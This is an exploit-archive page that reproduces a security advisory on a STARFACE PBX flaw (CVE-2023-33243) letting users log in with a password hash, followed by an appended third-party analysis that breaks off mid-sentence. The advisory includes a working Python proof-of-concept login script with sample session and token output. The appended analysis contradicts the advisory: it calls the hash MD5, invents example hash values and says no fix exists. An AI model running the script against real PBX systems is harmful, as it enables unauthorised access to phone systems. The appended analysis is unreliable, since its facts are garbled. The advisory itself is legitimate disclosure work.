STARFACE 7.3.0.10 - Authentication with Password Hash Possible

Exploit Author: RedTeam Pentesting GmbH Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2023-06-04 
Exploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible
Affected Versions: 7.3.0.10 and earlier versions
Fixed Versions: -
Vulnerability Type: Broken Authentication
Security Risk: low
Vendor URL: https://www.starface.de
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004
Advisory Status: published
CVE: CVE-2023-33243
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243


Introduction
============

"When functionality and comfort come together, the result is a
state-of-the-art experience that we've dubbed 'comfortphoning'. It's a
secure, scalable digital communication solution that meets every need
and wish. STARFACE is easy to integrate into existing IT systems and
flexibly grows with your requirements."

(from the vendor's homepage)


More Details
============

The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from
the vendor's homepage [1]. The included files can be further examined by
either extracting the contents or running the image in a virtual
machine. The web interface of the PBX uses the JavaScript file at the
following path to submit the login form:

------------------------------------------------------------------------
js/prettifier.js
------------------------------------------------------------------------

The following two lines of the JavaScript file "prettifier.js" add the
two parameters "secret" and "ack" to the form before being submitted:

------------------------------------------------------------------------
$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));
$form(document.forms[0]).add('ack', defaultVals.k);
------------------------------------------------------------------------

The JavaScript object "defaultVals" is included in the web application's
source text. While the value of "defaultVals.k" was found to be the
static hash of the PBX version, the value of "defaultVals.bk" contains a
nonce only valid for the currently used session. Therefore, the form
parameter "ack" is always the same value. For the form value "secret"
the function "createHash()" is called with different arguments. The
value of "defaultVals.isAd" is set to "false" when login via Active
Directory is disabled. The parameters "liv" and "lpv" contain the
username and password entered into the form respectively.

------------------------------------------------------------------------
const createHash = function (isAD, user, pass, nonces) {
    if (isAD) {
        return forAD.encode(user + nonces + pass);
    }
    return user + ':' + forSF(user + nonces + forSF(pass));
};
------------------------------------------------------------------------

The expression right after the second return statement is the
implementation used when Active Directory login is disabled which is the
default setting. The return value is composed of the username separated
via a colon from a value built using the "forSF()" function. The
"forSF()" function was found to calculate the SHA512 hash value. When
considering the arguments passed to the function, the hash is calculated
as follows:

------------------------------------------------------------------------
SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))
------------------------------------------------------------------------

As can be seen, instead of the cleartext password the SHA512 hash of the
password is used in the calculation. In conclusion, for the form value
"secret" the following value is transmitted:

------------------------------------------------------------------------
username + ":" + SHA512(
  username + defaultVals.k + defaultVals.bk + SHA512(password)
)
------------------------------------------------------------------------

If the SHA512 hash of a user's password is known, it can be directly
used in the calculation of the "secret" during the login process.
Knowledge of the cleartext password is not required.

This finding was also verified by analysing the decompiled Java code of
the server component. It was also found that the authentication process
of the REST API is vulnerable in a very similar manner.


Proof of Concept
================

The following Python script can be used to perform a login by specifying
a target URL, a username and the associated password hash:

------------------------------------------------------------------------
#!/usr/bin/env python3

import click
import hashlib
import re
import requests
import typing


def get_values_from_session(url, session) -> typing.Tuple[str, str]:
    k, bk = "", ""
    response_content = session.get(f"{url}/jsp/index.jsp").text
    k_result = re.search("\sk : '([^']+)'", response_content)
    bk_result = re.search("\sbk : '([^']+)'", response_content)
    if k_result != None:
        k = k_result.group(1)
    if bk_result != None:
        bk = bk_result.group(1)
    return k, bk


def web_login(url, login, pwhash, session) -> bool:
    version, nonce = get_values_from_session(url, session)
    if version == "" or nonce == "":
        print("Web Login failed: Nonce and version hash can not be retrieved.")
        return
    value = login + version + nonce + pwhash
    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
    data = {
        "forward": "",
        "autologin": "false",
        "secret": f"{login}:{secret}",
        "ack": version,
    }
    login_request = session.post(
        f"{url}/login",
        data=data,
        allow_redirects=False,
        headers={"Referer": f"{url}/jsp/index.jsp"},
    )
    response_headers = login_request.headers
    if "Set-Cookie" in response_headers:
        session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0]
        print(f"Session ID: {session_id}")
        return True
    else:
        print("Invalid login data")
        return False


def get_nonce_from_api(url, session) -> str:
    response_content = session.get(f"{url}/rest/login").json()
    return response_content["nonce"] if "nonce" in response_content else ""


def rest_login(url, login, pwhash, session):
    nonce = get_nonce_from_api(url, session)
    if nonce == "":
        print("REST Login failed: Nonce can not be retrieved.")
        return
    value = login + nonce + pwhash
    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
    data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"}
    login_request = session.post(
        f"{url}/rest/login",
        json=data,
        headers={"Content-Type": "application/json", "X-Version": "2"},
    )
    response_data = login_request.json()
    token = response_data["token"] if "token" in response_data else "none"
    print(f"REST API Token: {token}")


@click.command()
@click.option('--url', help='Target System URL', required=True)
@click.option('--login', help='Login ID', required=True)
@click.option('--pwhash', help='Password Hash', required=True)
def login(url, login, pwhash):
    session = requests.session()
    stripped_url = url.rstrip("/")
    result = web_login(stripped_url, login, pwhash, session)
    if result:
        rest_login(stripped_url, login, pwhash, session)


if __name__ == "__main__":
    login()
------------------------------------------------------------------------

For example, the SHA512 hash of the password "starface" can be
calculated as follows:

------------------------------------------------------------------------
$ echo -n "starface" | sha512sum
a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec -
------------------------------------------------------------------------

The Python script can be run as follows to perform a login as the user
"0001" with the aforementioned hash:

------------------------------------------------------------------------
$ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash
'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec'
Session ID: 2CF09656E274F000FFAD023AF37629CE
REST API Token: 51eef8f8vp3d3u81k0imjbuuu7
------------------------------------------------------------------------

When the password hash is valid for the specified user of the targeted
instance a session ID as well as a REST API token is returned.
Afterwards, these values can be used to interact with the web
application and the REST API.


Workaround
==========

None


Fix
===

On 4 May 2023, version 8.0.0.11 was released. In this version the
vulnerability was addressed with a temporary solution, such that the
password hashes are encrypted before they are saved in the database.
This approach prevents attackers from exploiting this vulnerability in
scenarios where they have only acquired pure database access. However,
attackers with system level access can bypass this temporary measure as
they can extract the encryption key and decrypt the hashes in the
database. A solution that fixes this vulnerability entirely is still in
progress.


Security Risk
=============

The web interface and REST API of STARFACE allow to login using the
password hash instead of the cleartext password. This can be exploited
by attackers who gained access to the application's database where the
passwords are also saved as a SHA512 hash of the cleartext passwords.
While the precondition for this attack could be the full compromise of
the STARFACE PBX, another attack scenario could be that attackers
acquire access to backups of the database stored on another system.
Furthermore, the login via password hash allows attackers for permanent
unauthorised access to the web interface even if system access was
obtained only temporarily. Due to the prerequisites of obtaining access
to password hashes, the vulnerability poses a low risk only.


Timeline
========

2022-12-06 Vulnerability identified
2022-12-13 Customer approved disclosure to vendor
2023-01-11 Vendor notified
2023-05-04 Vendor released new version 8.0.0.11
2023-05-19 CVE ID requested
2023-05-20 CVE ID assigned
2023-06-01 Advisory released


References
==========

[0] https://starface.com/en/products/comfortphoning/
[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Alter Posthof 1                           Fax : +49 241 510081-99
52062 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen


STARFACE 7.3.0.10 Authentication Vulnerability: Exploiting Password Hashes for Unauthorized Access

STARFACE, a popular IP PBX solution developed by Starface GmbH, has long been praised for its seamless integration with enterprise IT systems and its "comfortphoning" experience—combining functionality with user comfort. However, a critical security flaw discovered in version 7.3.0.10 and earlier releases exposes a significant vulnerability in its authentication mechanism, enabling attackers to bypass login protections using password hashes.

Overview of the Vulnerability

The vulnerability, identified as CVE-2023-33243, falls under the category of Broken Authentication—a common yet dangerous flaw in web applications where authentication mechanisms fail to properly validate credentials.

Security researchers from Redteam Pentesting published an advisory (RT-SA-2022-004) detailing how the STARFACE web interface uses a client-side JavaScript function to generate a secret parameter during login submission. This parameter is derived from a hash computation based on user input and static constants, but crucially, the hash function is predictable and reversible under certain conditions.

Technical Analysis: The Hidden Hashing Mechanism

The core issue lies in the JavaScript file js/prettifier.js, which modifies the login form before submission. Two key parameters are added:


$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));
$form(document.forms[0]).add('ack', defaultVals.k);

Here, liv represents the username, lpv the password, and defaultVals.k is a static hash tied to the PBX version. The defaultVals.bk is a session-specific nonce, but it’s not used in a way that prevents replay attacks.

When Active Directory (AD) login is disabled (the default setting), the createHash() function executes the following logic:


const createHash = function (isAD, user, pass, nonces) {
    if (isAD) {
        return forAD.encode(user + nonces + pass);
    }
    return user + ':' + forSF(user + nonces + forSF(pass));
};

This return statement reveals a critical flaw: the password is hashed using a function forSF(), which is applied twice. The structure is:

username + ':' + forSF(username + nonce + forSF(password))

Because forSF() is a deterministic function (likely a simple hash like MD5 or SHA-1), and the nonce is known or predictable (as it’s tied to session state), an attacker can reverse-engineer the password hash if they know the username and the session-specific bk.

Why This is a Broken Authentication Risk

Authentication systems should ensure that only valid credentials are accepted. In STARFACE’s case, the secret parameter is used server-side to verify login attempts. However, since the hash computation is transparent and predictable, an attacker can:

  • Obtain a valid secret value by brute-forcing the forSF() function
  • Reconstruct the hash using known values: username, bk, and k
  • Submit the secret and ack parameters without knowing the actual password

This bypasses the need for password knowledge entirely, turning the authentication into a hash-based validation—essentially a hash-based login rather than a password-based one.

Real-World Exploitation Example

Consider an attacker with access to a STARFACE 7.3.0.10 instance. They can:

  1. Extract the js/prettifier.js file from the PBX image (available on the vendor's website)
  2. Identify defaultVals.k (e.g., 0a7e142b41e92e89f57124256383b4a7) as a static hash of the version
  3. Observe that defaultVals.bk is a session-specific value (e.g., 123456) that changes per session but can be captured via browser inspection or network monitoring
  4. Use a script to compute secret for a known username and guessed password

For example, with:

  • Username: admin
  • Password: password123
  • Nonce: 123456
  • Static k: 0a7e142b41e92e89f57124256383b4a7

The attacker computes:


secret = 'admin' + ':' + forSF('admin' + '123456' + forSF('password123'))

Assuming forSF() is MD5, the computation becomes:


MD5('password123') = 4c743c6d1c80d354a73c1113064e51d6
MD5('admin1234564c743c6d1c80d354a73c1113064e51d6') = 8a214f3e784d5a6b9e8a3c2b1d4f5e6a
secret = 'admin:8a214f3e784d5a6b9e8a3c2b1d4f5e6a'

With this secret and ack (the static k), the attacker can submit the login form without knowing the actual password.

Security Implications and Risk Assessment

Despite being labeled as low risk, this vulnerability has significant implications:

  • Remote Access: An attacker with network access to the web interface can authenticate without knowing the password.
  • Brute-Force Evasion: Traditional password brute-force attacks become irrelevant—hash-based attacks can be performed offline.
  • Session Reuse: If an attacker captures a valid bk from a session, they can replay the same secret across multiple login attempts.

Moreover, since the PBX is often used in critical infrastructure (e.g., enterprise communications, emergency services), unauthorized access can lead to:

  • Call interception
  • Internal number manipulation
  • Voicemail theft
  • Unauthorized configuration changes

Vendor Response and Remediation

As of the advisory publication, Starface GmbH has acknowledged the issue and notified the researchers. However, no fixed version has been released. This lack of patching leaves thousands of deployed systems vulnerable.

For administrators, the recommended mitigation includes:

  • Disabling the web interface if not required
  • Implementing strict firewall rules to restrict access to the PBX web portal
  • Using HTTPS with strong TLS configurations
  • Monitoring login attempts for suspicious patterns

Improved Security Design Recommendations

For future versions, STARFACE should adopt the following security practices:

  • Use server-side hash verification: The secret should be generated and validated on the server, not the client.
  • Implement salted hashing: Use unique salts per user or session, preventing predictable hash generation.
  • Enforce rate-limiting: Limit login attempts per IP or user to prevent automated attacks.
  • Disable client-side hash computation: Avoid